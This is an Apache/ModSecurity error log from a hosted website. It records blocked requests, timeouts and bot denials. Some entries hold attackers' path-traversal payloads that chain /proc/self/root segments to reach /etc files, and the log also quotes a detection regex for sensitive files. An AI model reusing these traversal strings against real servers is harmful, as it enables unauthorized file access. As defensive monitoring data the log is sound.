[Fri Mar 20 00:05:06.131473 2026] [access_compat:error] [pid 8307:tid 140411733534464] [client 203.55.81.2:53504] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:05:08.805434 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.228.61:47278] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby5ZPXLqtnMIWvjpaJQ3AAAAoM"]
[Fri Mar 20 00:05:10.185903 2026] [proxy_fcgi:error] [pid 21563:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39976] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:05:17.136969 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:47924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby5bf-YZRR_7pZ7nDK-RgAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 00:05:19.679146 2026] [mime_magic:error] [pid 7893:tid 140411565680384] (70014)End of file found: [client 57.141.18.67:43466] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:05:25.440068 2026] [access_compat:error] [pid 21219:tid 140411574073088] [client 51.210.109.18:52683] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:05:40.129792 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] [client 195.123.216.134:32952] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:05:41.035964 2026] [core:alert] [pid 20435:tid 140411590858496] [client 57.141.18.117:43894] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 00:05:42.137889 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40856] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:05:44.580421 2026] [proxy_fcgi:error] [pid 20435:tid 140411733534464] [client 158.220.116.59:49546] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Fri Mar 20 00:05:48.285573 2026] [proxy_fcgi:error] [pid 7235:tid 140411590858496] [client 51.210.110.147:41205] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:05:51.565661 2026] [access_compat:error] [pid 15826:tid 140411649607424] [client 195.123.216.134:41014] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:05:52.900370 2026] [access_compat:error] [pid 15826:tid 140411574073088] [client 185.181.61.201:49856] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:05:56.606799 2026] [access_compat:error] [pid 17887:tid 140411540502272] [client 103.46.140.100:40102] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:06:01.371226 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:50082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby5mf-YZRR_7pZ7nDK-YwAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 00:06:06.109805 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41480] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:06:09.474069 2026] [mime_magic:error] [pid 27293:tid 140411582465792] (70014)End of file found: [client 57.141.18.68:44698] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:06:13.075029 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:41648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby5pf-YZRR_7pZ7nDK-awAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:06:16.157409 2026] [proxy_fcgi:error] [pid 20435:tid 140411590858496] [client 185.220.101.16:4948] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:06:19.197804 2026] [access_compat:error] [pid 30077:tid 140411725141760] [client 51.210.109.18:38023] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:06:29.777842 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42114] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:06:37.958009 2026] [mime_magic:error] [pid 14269:tid 140411674785536] (70014)End of file found: [client 57.141.18.1:45550] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:06:41.752617 2026] [access_compat:error] [pid 8307:tid 140411733534464] [client 195.123.216.134:47594] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:06:44.411136 2026] [access_compat:error] [pid 8307:tid 140411733534464] [client 51.210.104.64:50505] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:06:52.125774 2026] [proxy_fcgi:error] [pid 20435:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42812] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:06:55.555225 2026] [access_compat:error] [pid 21563:tid 140411540502272] [client 102.129.153.60:62873] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:06.104273 2026] [access_compat:error] [pid 21219:tid 140411607643904] [client 185.220.101.5:33040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:14.077799 2026] [proxy_fcgi:error] [pid 5816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43460] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:07:21.033778 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] [client 192.42.116.95:48874] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:07:23.247256 2026] [proxy_fcgi:error] [pid 8307:tid 140411590858496] [client 124.198.131.121:19590] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:07:24.536892 2026] [mime_magic:error] [pid 21563:tid 140411548894976] (70014)End of file found: [client 74.7.241.31:41290] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Fri Mar 20 00:07:24.537302 2026] [access_compat:error] [pid 21563:tid 140411548894976] [client 74.7.241.31:41290] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Fri Mar 20 00:07:35.133791 2026] [proxy_fcgi:error] [pid 19655:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44076] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:07:42.379828 2026] [access_compat:error] [pid 21219:tid 140411649607424] [client 51.210.111.249:50457] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:48.063683 2026] [access_compat:error] [pid 15826:tid 140411666392832] [client 173.244.33.6:41963] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:50.443226 2026] [access_compat:error] [pid 26799:tid 140411741927168] [client 195.123.216.134:33696] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:51.310758 2026] [access_compat:error] [pid 5816:tid 140411540502272] [client 37.120.142.167:52403] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:52.650424 2026] [access_compat:error] [pid 20435:tid 140411691570944] [client 185.220.100.248:52250] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:52.675260 2026] [access_compat:error] [pid 17653:tid 140411708356352] [client 51.210.107.182:55245] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:54.440841 2026] [access_compat:error] [pid 7893:tid 140411741927168] [client 194.163.136.187:54514] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:07:56.694393 2026] [access_compat:error] [pid 26799:tid 140411548894976] [client 2.58.56.46:51570] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:08:01.141803 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44802] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:08:28.126498 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45520] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:08:38.478900 2026] [access_compat:error] [pid 17887:tid 140411649607424] [client 31.133.0.235:50291] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:08:40.948058 2026] [access_compat:error] [pid 7893:tid 140411557287680] [client 45.66.35.35:38234] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:09:01.093835 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46366] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:09:03.431086 2026] [proxy_fcgi:error] [pid 7893:tid 140411708356352] [client 51.210.110.194:55389] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:09:22.749448 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 57.141.18.55:50726] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:09:31.122754 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47114] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:09:56.457414 2026] [access_compat:error] [pid 14269:tid 140411674785536] [client 109.70.100.11:49118] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:09:59.339668 2026] [access_compat:error] [pid 26799:tid 140411733534464] [client 149.34.243.84:43873] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:10:02.245845 2026] [proxy_fcgi:error] [pid 19655:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47918] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:10:15.915029 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.228.61:37448] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby6l_qxLDW4GITHUkSbswAAARI"]
[Fri Mar 20 00:10:28.126002 2026] [proxy_fcgi:error] [pid 7893:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48546] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:10:41.437786 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] [client 208.109.191.182:34644] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:10:46.775557 2026] [access_compat:error] [pid 21219:tid 140411590858496] [client 188.214.125.38:39043] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:10:51.137853 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49210] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:10:53.186791 2026] [access_compat:error] [pid 26799:tid 140411683178240] [client 51.210.104.67:44197] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:10:58.108896 2026] [access_compat:error] [pid 7545:tid 140411641214720] [client 192.42.116.51:18151] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:11:07.021781 2026] [access_compat:error] [pid 20435:tid 140411624429312] [client 171.25.158.113:34446] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:11:13.317786 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49824] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:11:22.282574 2026] [access_compat:error] [pid 30077:tid 140411725141760] [client 192.42.116.99:44747] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 00:11:30.304755 2026] [proxy_fcgi:error] [pid 7893:tid 140411565680384] [client 178.218.144.99:41864] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 00:11:30.431708 2026] [core:alert] [pid 7893:tid 140411741927168] [client 57.141.18.80:54538] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 00:11:31.577017 2026] [mime_magic:error] [pid 21563:tid 140411599251200] (70014)End of file found: [client 57.141.18.99:54684] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 00:11:39.129824 2026] [proxy_fcgi:error] [pid 20435:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50604] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:11:45.427606 2026] [:error] [pid 7545:tid 140411632822016] [client 74.7.241.31:50084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby68X8B84UptSoTJtZBogAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Fri Mar 20 00:12:03.114106 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51272] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:12:16.283924 2026] [mime_magic:error] [pid 27293:tid 140411699963648] (70014)End of file found: [client 74.7.243.128:52402] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/tuned
[Fri Mar 20 00:12:16.284122 2026] [access_compat:error] [pid 27293:tid 140411699963648] [client 74.7.243.128:52402] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/tuned
[Fri Mar 20 00:12:20.959366 2026] [:error] [pid 19655:tid 140411599251200] [client 74.7.243.128:49704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7FE1ujooLWdUDGy4HuQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:12:29.065093 2026] [proxy_fcgi:error] [pid 7893:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52118] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:12:41.042957 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.228.61:37662] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby7KfXLqtnMIWvjpaJRxQAAAoA"]
[Fri Mar 20 00:12:50.117846 2026] [proxy_fcgi:error] [pid 20435:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52748] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:13:04.796808 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.244.43:42210] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aby7QPXLqtnMIWvjpaJR1gAAApI"]
[Fri Mar 20 00:13:12.133815 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53450] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:13:36.127380 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54114] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:13:44.535380 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:46866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7aEpm7ZmxKZTM4bZ5MAAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:13:49.342727 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:39508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7bfu8EFLIOrSqIpvakgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:13:55.155491 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:39510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7cwbLMZ6AikZjR9WQQAAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:14:00.141778 2026] [proxy_fcgi:error] [pid 19655:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54880] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:14:00.206149 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:38112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7eOoXxyEfFpUF8f8_1wAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
